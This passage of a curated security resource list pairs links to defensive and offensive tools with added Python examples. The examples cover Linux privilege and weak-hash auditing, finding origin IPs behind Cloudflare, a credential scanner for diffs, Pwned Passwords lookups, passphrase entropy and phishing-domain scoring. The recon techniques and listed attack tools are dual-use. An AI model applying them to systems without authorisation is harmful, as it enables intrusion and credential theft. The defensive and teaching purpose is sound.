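                            groups: Dict[str, Tuple[int, Set[str]]]) -> Dict[str, Set[str]]:
    """Non-root users who reach root via group membership. A user whose primary
    gid in /etc/passwd is the group's gid is a member even if not listed in /etc/group."""
    result: Dict[str, Set[str]] = {}
    for gname, (gid, members) in groups.items():
        if gname not in ROOT_EQUIVALENT_GROUPS:
            continue
        found = set(members) | {u for u, (_uid, ugid) in users.items() if ugid == gid}
        found = {u for u in found if users.get(u, (1, 1))[0] != 0}  # drop uid 0 itself
        if found:
            result[gname] = found
    return result


def classify_hash(field: str) -> str:
    """Describe the second field of a shadow entry."""
    if field == "":
        return "empty"
    if field[0] in "!*":
        return "locked"
    for prefix, name in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name
    if len(field) == 13 and "$" not in field:
        return "descrypt"  # traditional DES crypt, 13 printable characters
    return "unknown"


def shadow_findings(text: str) -> List[Tuple[str, str]]:
    """(user, issue) for entries a cracker or an attacker would go for first."""
    findings: List[Tuple[str, str]] = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, field, *_rest = line.split(":")
        kind = classify_hash(field)
        if kind == "empty":
            findings.append((name, "empty password"))
        elif kind in LEGACY:
            findings.append((name, f"legacy hash ({kind})"))
        elif kind == "unknown":
            findings.append((name, "unrecognized hash format"))
    return findings


if __name__ == "__main__":
    print(root_equivalent_members(parse_passwd(SAMPLE_PASSWD), parse_group(SAMPLE_GROUP)))
    print(shadow_findings(SAMPLE_SHADOW))
```

On the sample data the audit reports alice (sudo) and both bob and svc in lxd, the latter only through its primary gid, plus bob's md5crypt hash and svc's empty password field. Point the parsers at the real files on a host you are assessing, and adjust ROOT_EQUIVALENT_GROUPS for groups like disk or adm that matter in your environment.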
- A gentle introduction to Linux Kernel fuzzing - code
- Teardown of a Failed Linux LTS Spectre Fix: Today's blog will serve as a deep dive into a recent Spectre fix, one of dozens being manually applied to the upstream Linux kernel. We'll cover the full path this fix took, from its warning-inducing initial state to its correction upstream and then later brokenness when backported to all of the upstream Long Term Support (LTS) kernels.
- Ropstar: Automatic exploit generation for simple linux pwn challenges.
- Ken Thompson's Unix password
- Exploiting Wi-Fi Stack on Tesla Model S
- dlinject.py: Inject a shared library (i.e. arbitrary code) into a live linux process, without ptrace
- (Ab)using Kerberos from Linux
- LKRG: Linux Kernel Runtime Guard
- Privilege Escalation via Python Library Hijacking
- Logging Passwords on Linux
- Kicksecure ™: A Security-hardened, Non-anonymous Linux Distribution
- Setuid Demystified
- ProcDump-for-Linux: A Linux version of the ProcDump Sysinternals tool
- Scout Suite: Multi-Cloud Security Auditing Tool
- Cloud Security Research: Cloud-related research releases from the Rhino Security Labs team.
- Azure-Readiness-Checklist: This checklist is your guide to the best practices for deploying secure, scalable, and highly available infrastructure in Azure. Before you go live, go through each item, and make sure you haven't missed anything important!
- gVisor: is an application kernel, written in Go, that implements a substantial portion of the Linux system surface.
- PARSEC: Platform AbstRaction for SECurity service
- CloudFail: Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network
- (discontinued) HatCloud
- Uncovering bad guys hiding behind CloudFlare
- CloudFlair: Find origin servers of websites behind CloudFlare by using Internet-wide scan data from Censys.
- thsosrtl: Repo for tools - cloud and vpn. cloudIP: originally intended for attempting to resolve the true IP address of targets served through Cloudflare.
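The origin-discovery tools above all reduce to one check: which of the addresses ever associated with a hostname are *not* Cloudflare edge IPs. Added example (my code, not from any of the tools listed): it embeds a hand-copied snapshot of Cloudflare's published IPv4 ranges (assumption: the authoritative list is https://www.cloudflare.com/ips/ and changes over time; IPv6 ranges are omitted) and filters constructed DNS-history records down to origin candidates. Confirming that a candidate really serves the site still needs an HTTP request to that IP with the target `Host` header, which this offline example does not do.

```python
import ipaddress

# Snapshot of Cloudflare's IPv4 edge ranges, copied by hand when this example was
# written (assumption: refresh from https://www.cloudflare.com/ips/ before relying on it).
CLOUDFLARE_V4 = [ipaddress.ip_network(n) for n in (
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
)]


def is_cloudflare(ip: str) -> bool:
    """True if ip falls inside one of the edge ranges. Raises ValueError for non-IP input."""
    addr = ipaddress.ip_address(ip)
    # An IPv6 address is never "in" an IPv4 network, so v6 input simply yields False here.
    return any(addr in net for net in CLOUDFLARE_V4)


def candidate_origins(records):
    """records: iterable of (hostname, ip, source) triples gathered from current DNS,
    passive-DNS history, mail/ftp/direct.* subdomains, etc.  Returns the triples whose
    address is NOT a Cloudflare edge, i.e. the origin candidates worth probing."""
    out = []
    for host, ip, source in records:
        try:
            if is_cloudflare(ip):
                continue
        except ValueError:
            continue  # junk that is not an IP literal
        out.append((host, ip, source))
    return out


# Constructed sample: the site is fronted by Cloudflare today, but its mail host and a
# 2017 passive-DNS entry still point straight at the origin (203.0.113.0/24 is TEST-NET-3).
SAMPLE_RECORDS = [
    ("www.example.test", "104.16.1.1", "current DNS"),
    ("mail.example.test", "203.0.113.7", "current DNS"),
    ("www.example.test", "203.0.113.7", "passive DNS 2017"),
    ("ftp.example.test", "not-an-ip", "scraper noise"),
]

if __name__ == "__main__":
    for host, ip, source in candidate_origins(SAMPLE_RECORDS):
        print(f"{host:20} {ip:15} ({source})")
```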
- Preventing Exposed Azure Blob Storage
- Open Azure blobs search on grayhatwarfare.com and other updates
- git-secrets: Prevents you from committing secrets and credentials into git repositories.
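What a tool like git-secrets does on every commit is scan only the *added* lines of the staged diff for credential shapes and for suspiciously random tokens. Added example (my own code, not git-secrets' implementation) showing both checks over a constructed diff: a regex for the public AWS access key ID format (AKIA/ASIA plus 16 upper-case alphanumerics), a secret-key assignment, PEM private-key headers, and a Shannon-entropy test that catches opaque tokens the regexes miss while leaving placeholder strings alone. The key values in the sample are AWS's documented example credentials, not live ones; the 4.0 bits/char threshold is an assumption to tune per repository.

```python
import math
import re

# Credential shapes. The AKIA/ASIA + 16 chars form is AWS's documented key-ID format;
# the other two are generic. Each pattern may expose the secret itself as group 1.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "aws_secret_assignment": re.compile(
        r'''(?i)aws_secret_access_key\s*[=:]\s*['"]?([A-Za-z0-9/+=]{40})['"]?'''),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}

# Candidate opaque tokens for the entropy check: 20+ chars of base64/hex/url-safe symbols.
HIGH_ENTROPY_TOKEN = re.compile(r"[A-Za-z0-9+/=_\-]{20,}")


def shannon_entropy(s: str) -> float:
    """Bits per character; 0 for a repeated symbol, log2(k) for k equiprobable symbols."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_added_lines(diff_text: str, entropy_threshold: float = 4.0):
    """Return (diff_line_no, reason, matched_text) for every finding on a '+' line.
    Lines that already matched a named pattern are not re-reported as high-entropy."""
    findings = []
    for i, line in enumerate(diff_text.splitlines(), 1):
        if not line.startswith("+") or line.startswith("+++"):
            continue
        body = line[1:]
        matched = False
        for name, pat in PATTERNS.items():
            for m in pat.finditer(body):
                findings.append((i, name, m.group(m.lastindex or 0)))
                matched = True
        if matched:
            continue
        for m in HIGH_ENTROPY_TOKEN.finditer(body):
            tok = m.group(0)
            if shannon_entropy(tok) >= entropy_threshold:
                findings.append((i, "high_entropy", tok))
    return findings


# Constructed diff. The AWS values are the example credentials from AWS's own documentation.
SAMPLE_DIFF = """\
--- a/config.py
+++ b/config.py
@@ -1,3 +1,6 @@
 import os
-AWS_KEY = os.environ["AWS_ACCESS_KEY_ID"]
+AWS_KEY = "AKIAIOSFODNN7EXAMPLE"
+aws_secret_access_key = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
+REGION = "us-east-1"
+API_TOKEN = "a8f3Kq9ZpL2mX7vR4tY1wE6uB0nC5dH8"
+PLACEHOLDER = "xxxxxxxxxxxxxxxxxxxxxxxx"
"""

if __name__ == "__main__":
    for line_no, reason, text in scan_added_lines(SAMPLE_DIFF):
        print(f"line {line_no}: {reason}: {text}")
```

As a pre-commit hook the input would be `git diff --cached -U0` and any finding should make the hook exit non-zero; the entropy threshold is the knob that trades missed tokens against false positives on things like content hashes.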
- CloudMapper: CloudMapper helps you analyze your Amazon Web Services (AWS) environments.
- Security Monkey: Security Monkey monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time.
- my-arsenal-of-aws-security-tools: List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
- RKMS: RKMS is a highly available key management service, built on top of AWS's KMS.
- FireProx: AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation.
- AWS IAM privileges as found using the AWS Policy Generator described at
- Sadcloud: A tool for standing up (and tearing down!) purposefully insecure cloud infrastructure.
- (PT-BR) Cyber Risk Management
- RITA (Real Intelligence Threat Analytics)
- "Blended threats are the future, because no matter how good your cloud security is, at some point a grumpy SRE who feels jilted over some work BS is gonna enjoy pulling one over on those C suite assholes, for $20k cash" by grugq.
- ISO27001 audit in real-time....
- Gearing Towards Your Next Audit: Understanding the Difference Between Best Practice Frameworks and Regulatory Compliance Standards.
- Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use. nuclei-templates: Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.
- Secure design principles
- NIST Special Publication 800-63B: Digital Identity Guidelines
- Easy Ways to Build a Better P@$5w0rd
- Time for Password Expiration to Die
- GRASSMARLIN: Provides situational awareness of Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) networks in support of network security assessments.
- Qualcomm chain-of-trust
- Presenting QCSuper: a tool for capturing your 2G/3G/4G air traffic on Qualcomm-based phones. github
- Logitech keyboards and mice vulnerable to extensive cyber attacks
- Cartero: Social Engineering Framework
- The Basics of Social Engineering by Chris Pritchard at DEF CON 27. Books suggested:
- Never Split the Difference - Chris Voss
- The Charisma Myth - Olivia Fox Cabane
- Hacking the Human - Ian Mann
- The Art Of Social Engineering - Chris Hadnagy
- What Every BODY is Saying - Joe Navarro
- Network Security Monitoring on Raspberry Pi type devices
- A secure, shared workspace for secrets
- bettercap, the Swiss army knife for network attacks and monitoring.
- Quijote is a highly configurable HTTP middleware for API security.
- Tool Analysis Result Sheet and guide, via Detecting Lateral Movement through Tracking Event Logs by jpcertcc
- EKOLABS tools repo
- Vapor PwnedPasswords Provider: Package for testing a password against Pwned Passwords V2 API in Vapor
- Is my password pwned?, bash script
- XPoCe - XPC Snooping utilities for MacOS and iOS (version 2.0)
- Enterprise Password Quality Checking using any hash data sources (HaveIBeenPwned lists, et al)
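The three entries above all talk to the Pwned Passwords range API, whose k-anonymity design is worth seeing concretely: the client sends only the first five hex characters of SHA-1(password), receives every suffix in that bucket, and matches locally, so the service never learns the full hash. Added example (my code, not the Vapor package's or the bash script's): the response body is a constructed stand-in for `GET https://api.pwnedpasswords.com/range/<prefix>`, whose real format is one `SUFFIX:COUNT` per line; the count shown for "password" is made up, only the hash is real.

```python
import hashlib


def sha1_split(password: str):
    """(first 5 hex chars, remaining 35) of SHA-1(password), upper-case as the API returns them."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def count_from_range_body(suffix: str, body: str) -> int:
    """Match our suffix against a range response.  Returns the breach count, 0 if absent.
    Rows with count 0 occur when the Add-Padding header is used; treating them as
    'not found' is correct."""
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        cand, _, count = line.partition(":")
        if cand.upper() == suffix:
            return int(count)
    return 0


def check_password(password: str, fetch_range) -> int:
    """fetch_range(prefix) -> response text.  Only the 5-char prefix ever leaves the client."""
    prefix, suffix = sha1_split(password)
    return count_from_range_body(suffix, fetch_range(prefix))


# Constructed response for prefix 5BAA6 (SHA-1("password") = 5BAA6 1E4C9B93F3F0682250B6CF8331B7EE68FD8).
# The neighbouring suffixes and all counts are invented for the example.
FAKE_RANGE_BODIES = {
    "5BAA6": "\n".join([
        "1D2DA4053E34E76F6576ED1DA63134B5E2A:2",
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493",
        "1F1A6A7B9B4D2C5E8F0A1B2C3D4E5F6A7B8:0",
    ]),
}


def fake_fetch(prefix: str) -> str:
    """Offline stand-in for the HTTPS call; a real client would GET the range URL here."""
    return FAKE_RANGE_BODIES.get(prefix, "")


if __name__ == "__main__":
    for pw in ("password", "correct horse battery staple"):
        print(pw, "->", check_password(pw, fake_fetch))
```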
- DockerAttack: Various Tools and Docker Images
- PyREBox is a Python scriptable Reverse Engineering sandbox
- find3: High-precision indoor positioning framework, version 3
- structured-text-tools: A list of command line tools for manipulating structured text data
- telnetlogger: Simulates enough of a Telnet connection in order to log failed login attempts.
- vault: A tool for secrets management, encryption as a service, and privileged access management
- WeakNet LINUX 8: This is an information-security themed distribution that has been in development since 2010.
- HiTB: it was part of the HackTheBox platform.
- arphid: DIY 125KHz RFID read/write/emulate guide
- Pybelt: The hackers tool belt
- mhax
- U2F Support Firefox Extension
- git-bug: Distributed bug tracker embedded in Git
- mkcert: A simple zero-config tool to make locally trusted development certificates with any names you'd like
- trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
- Polymorph is a real-time network packet manipulation framework with support for almost all existing protocols
- query_huawei_wifi_router: A CLI tool that queries a Huawei LTE WiFi router (MiFi) to get statistics such as signal strength, battery status, remaining data balance etc
- kravatte: Implementation of Kravatte Encryption Suite
- noisy: Simple random DNS, HTTP/S internet traffic noise generator
- infernal-twin: wireless hacking - an automated wireless hacking tool
- PatternAnalyzer: The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use.
- Google Chromium, sans integration with Google
- Gammux: A Gamma muxing tool. This tool merges two pictures together by splitting them into high and low brightness images.
- PDF Tools
- openvotenetwork: Implementation of anonymous Open Vote Network in go
- put2win: Script to automate shell upload via the HTTP PUT method to get meterpreter
- Tools by Morphus Labs
- Stratosphere IPS
- Convert nmap Scans into Beautiful HTML Pages
- GeoInt
- python-nubia: A command-line and interactive shell framework.
- nipe: a script that makes the Tor network your default gateway.
- fuxploider: File upload vulnerability scanner and exploitation tool.
- solo: FIDO2 USB+NFC token optimized for security, extensibility, and style
- Joint Report On Publicly Available Hacking Tools: by Canadian Centre for Cyber Security.
- APTSimulator: A toolset to make a system look as if it was the victim of an APT attack
- debugger-netwalker: NetWalker Debugger
- USB armory: open source flash-drive-sized computer
- batch_deobfuscator: Deobfuscate batch scripts obfuscated using string substitution and escape character techniques.
- Bashfuscator: A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.
- Big List of Naughty Strings
- Netflix Cloud Security SIRT releases Diffy: A Differencing Engine for Digital Forensics in the Cloud - diffy repo.
- Command-Line Snippets: A place to share useful, one-line commands that make your life easier.
- IP-to-ASN - Team Cymru
- 4nonimizer: A bash script for anonymizing the public IP used for browsing the Internet, managing the connection to the TOR network and to different VPN providers (OpenVPN).
- free Entropy Service.
- Correct Horse Battery Staple: Secure password generator to help keep you safer online. code
- CorrectHorse: random secure password generator.
- XKCD-password-generator: Generate secure multiword passwords/passphrases, inspired by XKCD
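The generators above (and the d20/diceware method further down the list) rest on one arithmetic fact: a passphrase drawn uniformly from a wordlist carries `n * log2(list size)` bits, regardless of how long or odd the words are. Added example (my code, not any of the linked generators) that computes that entropy, tells you how many words a target strength needs, maps physical dice rolls to a list index the way diceware does, and draws words with `secrets` rather than `random`. The 20-word list is constructed and deliberately tiny; the numbers it produces show why real lists have 7776 (5d6) or 8000 (3d20) entries.

```python
import math
import secrets

# Constructed mini wordlist. A real list (EFF large: 7776 words; a d20 list: 8000) is
# what you would load from a file; this one only exists to make the example run.
WORDLIST = [
    "correct", "horse", "battery", "staple", "anchor", "cobalt", "drizzle",
    "ember", "falcon", "granite", "harbor", "ivory", "juniper", "kestrel",
    "lantern", "marble", "nectar", "orbit", "pepper", "quartz",
]


def entropy_bits(n_words: int, wordlist_size: int) -> float:
    """Entropy of n uniformly chosen words: n * log2(size).  Word length is irrelevant."""
    return n_words * math.log2(wordlist_size)


def words_needed(target_bits: float, wordlist_size: int) -> int:
    """Smallest word count reaching target_bits with this list."""
    return math.ceil(target_bits / math.log2(wordlist_size))


def roll_to_index(sides: int, rolls) -> int:
    """Diceware-style mapping: rolls are base-`sides` digits, 1-based.  5d6 -> 0..7775,
    3d20 -> 0..7999.  A list indexed this way needs exactly sides**len(rolls) entries."""
    idx = 0
    for r in rolls:
        if not 1 <= r <= sides:
            raise ValueError(f"roll {r} is not possible on a d{sides}")
        idx = idx * sides + (r - 1)
    return idx


def generate(n_words: int, wordlist, sep: str = " ") -> str:
    """secrets.choice is uniform and CSPRNG-backed; random.choice is neither a secret
    source nor safe for this purpose."""
    return sep.join(secrets.choice(wordlist) for _ in range(n_words))


if __name__ == "__main__":
    print(generate(5, WORDLIST), f"({entropy_bits(5, len(WORDLIST)):.1f} bits)")
    print("words for 80 bits with this list:", words_needed(80, len(WORDLIST)))
    print("words for 80 bits with 7776-word list:", words_needed(80, 7776))
    print("5d6 roll [6,6,6,6,6] -> index", roll_to_index(6, [6, 6, 6, 6, 6]))
```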
- Using a Hardened Container Image for Secure Applications in the Cloud
- freedomfighting: A collection of scripts which may come in handy during your freedom fighting activities.
- Machine Learning and Security: Source code about machine learning and security.
- octofairy: A machine learning based GitHub bot for Issues.
- kbd-audio: Tools for capturing and analysing keyboard input paired with microphone capture
- certstreamcatcher: This tool is based on regex with effective standards for detecting phishing sites in real time using certstream and can also detect punycode (IDNA) attacks.
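The detection certstreamcatcher describes, regex heuristics over newly issued certificate names plus IDN (punycode) awareness, is compact enough to show end to end. Added example (my code, not certstreamcatcher's): it decodes `xn--` A-labels with Python's built-in `idna` codec, flags labels that mix Latin with Cyrillic or Greek letters (the homograph trick), and scores brand keywords, throw-away TLDs, hyphen count and nesting depth. The brand and TLD watchlists are constructed stand-ins for the lists a real deployment would load; the heuristics will false-positive on legitimate names such as `applepie.org`, which is why the output is a score to triage, not a verdict.

```python
import unicodedata

# Constructed watchlists; load real ones from files in practice.
BRANDS = ("paypal", "apple", "google", "microsoft", "amazon")
SUSPICIOUS_TLDS = {"tk", "ml", "ga", "cf", "gq", "top", "xyz"}


def decode_label(label: str) -> str:
    """A-label (xn--...) -> U-label via the stdlib idna codec; other labels pass through."""
    if label.lower().startswith("xn--"):
        return label.encode("ascii").decode("idna")
    return label


def scripts_in(text: str):
    """Script names of the letters in text, taken from the first word of each
    character's Unicode name (e.g. 'CYRILLIC SMALL LETTER A' -> 'CYRILLIC')."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in text if ch.isalpha()}


def score_domain(domain: str):
    labels = domain.lower().rstrip(".").split(".")
    decoded = [decode_label(lbl) for lbl in labels]
    reasons = []
    if any(lbl.startswith("xn--") for lbl in labels):
        reasons.append("punycode")
    if any(len(scripts_in(lbl) & {"LATIN", "CYRILLIC", "GREEK"}) > 1 for lbl in decoded):
        reasons.append("mixed-script label")
    name = ".".join(decoded)
    for brand in BRANDS:
        if brand in name and not name.endswith(brand + ".com"):
            reasons.append("brand keyword: " + brand)
    if labels[-1] in SUSPICIOUS_TLDS:
        reasons.append("suspicious TLD")
    if domain.count("-") >= 3:
        reasons.append("many hyphens")
    if len(labels) >= 4:
        reasons.append("deep subdomain")
    return len(reasons), reasons


def filter_stream(domains, threshold: int = 2):
    """Keep the names whose score reaches threshold, with their reasons."""
    hits = []
    for d in domains:
        score, reasons = score_domain(d)
        if score >= threshold:
            hits.append((d, reasons))
    return hits


# Constructed sample of names as a CT log feed would deliver them (A-labels, lower-case).
# The third entry is "аpple.com" with a Cyrillic 'а' (U+0430); idna-encoding it yields
# the xn-- form that certstream would show.
SAMPLE_STREAM = [
    "www.example.com",
    "login-paypal-secure-update.example.tk",
    "аpple.com".encode("idna").decode("ascii"),
    "mail.google.com",
]

if __name__ == "__main__":
    for domain, reasons in filter_stream(SAMPLE_STREAM):
        print(domain, reasons)
```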
- Wifiphisher: is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing.
- chezmoi: Manage your dotfiles securely across multiple machines.
- hexyl: A command-line hex viewer.
- Giggity: Wraps github api for openly available information about an organization, user, or repo.
- howmanypeoplearearound: Count the number of people around you by monitoring wifi signals.
- LASCAR: Ledger's Advanced Side-Channel Analysis Repository.
- Hostintel: A Modular Python Application To Collect Intelligence For Malicious Hosts - github
- DarkNet_ChineseTrading
- mXtract: Memory Extractor & Analyzer.
- commando-vm: a fully customized, Windows-based security distribution for penetration testing and red teaming.
- Request Tracker for Incident Response
- Introducing Inkdrop 4
- AntiCheat-Testing-Framework: Framework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. All this code is the result of a research done for Recon2019 (Montreal).
- IronPython, darkly: how we uncovered an attack on government entities in Europe
- inlets: Expose your local endpoints to the Internet
- Projects released by the Team intelstorm, papers
- Pwnagotchi: (⌐■_■) - Deep Reinforcement Learning vs WiFI
- spyse.py: Python API wrapper and command-line client for the tools hosted on spyse.com.
- Cloning a MAC address to bypass a captive portal
- Open Steno Project was founded by stenographer Mirabai Knight as a reaction to the closed down, proprietary nature of the court reporting industry.
- Machine Learning on Encrypted Data Without Decrypting It
- 0bin: Client side encrypted pastebin.
- Raspberry pi as poor man’s hardware hacking tool
- dorking (how to find anything on the Internet)
- usbkill: is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer.
- [cherrytree](https://www.giuspen.com/cherrytree/): A hierarchical note taking application, featuring rich text and syntax highlighting, storing data in a single XML or SQLite file. repo
- gs-transfer: Secure File Transfer via Global Socket Bounce Network.
- CORE: The Common Open Research Emulator (CORE) is a tool for emulating networks on one or more machines.
- VoightKampff: Beating Google ReCaptcha and the funCaptcha using AWS Rekognition.
- John the Ripper in the cloud: John the Ripper jumbo supports hundreds of hash and cipher types.
- SpamCop is the premier service for reporting spam.
- vector-edk: EFI Development Kit.
- H1R0GH057: tools (DDoS, lulz, etc..)
- gatekeeper: First open-source DDoS protection system
- uriDeep: Unicode encoding attacks with machine learning
- Rawsec's CyberSecurity Inventory: An inventory of tools and resources about CyberSecurity.
- gaijin tools
- Lord Of The Strings (LOTS): String extraction and classification tool for binary files, designed to extract only the strings that can be considered relevant (i.e. not garbage or false positives)
- Unit 42 Public Tools Repo: Listing of tools released by Palo Alto Networks Threat Intelligence team.
- glsnip: copy and paste across machines
- Security Tools: Most of the links listed here go to the original sites.
- Find Virtual Hosts for Any IP Address
- ngrok: Introspected tunnels to localhost
- Pybull: Contains some cool python projects. It is 100% python coded. Have fun
- Python-Scripts: some scripts for penetration testing.
- SubEnum: bash script for Subdomain Enumeration
- password-store: Simple password manager using gpg and ordinary unix directories.
- DarkSearch: The 1st real Dark Web search engine (Darksearch vs Ahmia)
- Search engines for Hackers:
- Insecam: Network live IP video cameras directory.
- jigsaw project by Alphabet/Google. Outline: VPN Server.
- SSHuttle: Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
- WireGuard: is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache.
- Crockford’s base 32 encoding: Crockford’s base 32 encoding is a compromise between efficiency and human legibility.
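Crockford's scheme encodes an integer, not a byte string, with a 32-symbol alphabet that drops I, L, O and U, and its legibility comes from the decoder: case is ignored, `I`/`L` are read as `1` and `O` as `0`, hyphens are skipped, and an optional check symbol (value mod 37, drawn from the alphabet extended with `*~$=U`) catches single-character slips. Added example (my implementation from the published description, not code from Crockford's page) covering encode, normalising decode and the check symbol. 1234 encoding to `16J` is the worked value from the spec.

```python
ALPHABET = "0123456789ABCDEFGHJKMNPQRSTVWXYZ"      # 32 symbols, no I L O U
CHECK_ALPHABET = ALPHABET + "*~$=U"                 # 37 symbols for the mod-37 check
_NORMALIZE = str.maketrans("IiLlOo", "111100")      # human-friendly aliases


def encode(n: int, check: bool = False) -> str:
    """Big-endian base-32 digits of a non-negative integer, optional check symbol appended."""
    if n < 0:
        raise ValueError("Crockford base32 encodes non-negative integers only")
    digits = []
    x = n
    while True:
        digits.append(ALPHABET[x & 31])
        x >>= 5
        if x == 0:
            break
    s = "".join(reversed(digits))
    if check:
        s += CHECK_ALPHABET[n % 37]
    return s


def decode(s: str, check: bool = False) -> int:
    """Inverse of encode, tolerant of case, hyphens and the I/L/O confusions.
    With check=True the last symbol is verified against value mod 37."""
    s = s.replace("-", "")
    if check:
        if len(s) < 2:
            raise ValueError("too short to carry a check symbol")
        s, chk = s[:-1], s[-1]
    s = s.upper().translate(_NORMALIZE)
    n = 0
    for ch in s:
        if ch not in ALPHABET:
            raise ValueError(f"invalid symbol {ch!r}")
        n = n * 32 + ALPHABET.index(ch)
    if check and chk.upper() != CHECK_ALPHABET[n % 37]:
        raise ValueError("check symbol mismatch")
    return n


if __name__ == "__main__":
    print(encode(1234), encode(1234, check=True))       # 16J 16JD
    print(decode("i6j"), decode("16-JD", check=True))   # both 1234
```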
- Sputnik -An Open Source Intelligence Browser Extension
- PCredz: This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.
- uncaptcha2: defeating the latest version of ReCaptcha with 91% accuracy
- Nefarious LinkedIn: A look at how LinkedIn spies on its users.
- ProtonVPN-CLI: Linux command-line client for ProtonVPN. Written in Python.
- CryFS: Keep your data safe in the cloud. code
- Cryptomator: Multi-platform transparent client-side encryption of your files in the cloud. code
- VeraCrypt: is a free open source disk encryption software for Windows, Mac OSX and Linux.
- CipherShed: is a program that can be used to create encrypted files or encrypt entire drives (including USB flash drives and external HDDs). code
- Boxcryptor: Security for your Cloud.
- Nextcloud E2E: End-to-end encryption RFC. Some old news about it
- DiskCryptor is an open encryption solution that offers encryption of all disk partitions, including the system partition. code
- ProjectSend is a free, open source software that lets you share files with your clients, focused on ease of use and privacy. It supports clients groups, system users roles, statistics, multiple languages, detailed logs... and much more!
- Explain Shell
- Examples of regular expressions
- A tcpdump Tutorial and Primer with Examples
- Capture WiFi / WLAN / 802.11 Probe Request with tcpdump
- A curated list of awesome Threat Intelligence resources
- Looking for value in EV Certificates
- How to find hidden cameras
- the Simple Encrypted Arithmetic Library (SEAL): This repository is a fork of Microsoft Research's homomorphic encryption implementation
- A port of ChibiOS to the Orchard radio platform
- Decent Security: Everyone can be secure.
- Introducing Certificate Transparency and Nimbus
- trillian: Trillian implements a Merkle tree whose contents are served from a data storage layer, to allow scalability to extremely large trees.
- CFSSL's CA trust store repository
- A Few Thoughts on Cryptographic Engineering
- Mailfence
- Threat Hunting Workshop - Methodologies for Threat Analysis
- Xoodoo
- CoPilot is a wireless hotspot for digital security trainers that provides an easy to use web interface for simulating custom censorship environments during trainings.
- AgentMaps: Make social simulations on interactive maps with Javascript!
- flowsscripts: Mining pool IPs.
- SwiftFilter: Exchange Transport rules to detect and enable response to phishing
- The Illustrated TLS Connection: Every Byte Explained
- Practical Cryptography
- Thieves and Geeks: Russian and Chinese Hacking Communities
- ephemera-miscellany: Ephemera and other documentation associated with the 1337list project.
- The New Illustrated TLS Connection
- CleverHans: An adversarial example library for constructing attacks, building defenses, and benchmarking both
- How to Roll a Strong Password with 20-Sided Dice and Fandom-Inspired Wordlists
- Assetnote Wordlists: When performing security testing against an asset, it is vital to have high quality wordlists for content and subdomain discovery.
- HTTP/3 Explained (github) and HTTP/2 Explained (github)
- The Practical Guide to Hacking Bluetooth Low Energy
- A Practical Guide to BLE Throughput
- Exploiting IoT enabled BLE smart bulb security
- security: Discussion area for security aspects of ECMAScript
- Template for Data Protection Impact Assessment (DPIA)
- hash collisions exploitation and other pocs, a script to collide PDFs
- Shodan - A tool for Security and Market Research
- Engineering Security: general book about a range of topics in security.
- (ru) Russian Army information security posters (Плакаты по информационной безопасности Российской армии): Russian counter-information posters.
- Kerberos (I): How does Kerberos work? – Theory
- Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs.
- Vulncode-DB project: The vulnerable code database (Vulncode-DB) is a database for vulnerabilities and their corresponding source code if available.
- One-End Encryption (OEE): Stronger than End-to-End Encryption
- Configuring MTA-STS and TLS Reporting For Your Domain
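MTA-STS has two moving parts: a `_mta-sts.<domain>` TXT record (`v=STSv1; id=<alnum>`) that announces a policy version, and an HTTPS-served policy file with `version`, `mode`, one or more `mx` patterns and `max_age`. Added example (my code, not from the linked article) that parses and validates both, including the constraints that bite in practice: `max_age` is capped at 31557600 seconds, `mode` must be one of `enforce`/`testing`/`none`, and an `mx` wildcard matches only the leftmost label, so `*.example.net` covers `mx1.example.net` but neither `example.net` nor `a.b.example.net`. The sample records are constructed.

```python
VALID_MODES = {"enforce", "testing", "none"}
MAX_AGE_LIMIT = 31557600  # RFC 8461: max_age is at most 31557600 s (about one year)


def parse_sts_txt(txt: str) -> dict:
    """Parse the _mta-sts TXT record; the id must be 1..32 alphanumerics."""
    fields = dict(p.strip().split("=", 1) for p in txt.split(";") if p.strip())
    ident = fields.get("id", "")
    if fields.get("v") != "STSv1" or not (0 < len(ident) <= 32 and ident.isalnum()):
        raise ValueError(f"not a valid MTA-STS TXT record: {txt!r}")
    return fields


def parse_policy(text: str) -> dict:
    """Parse the key: value policy file. 'mx' may repeat; unknown keys are ignored
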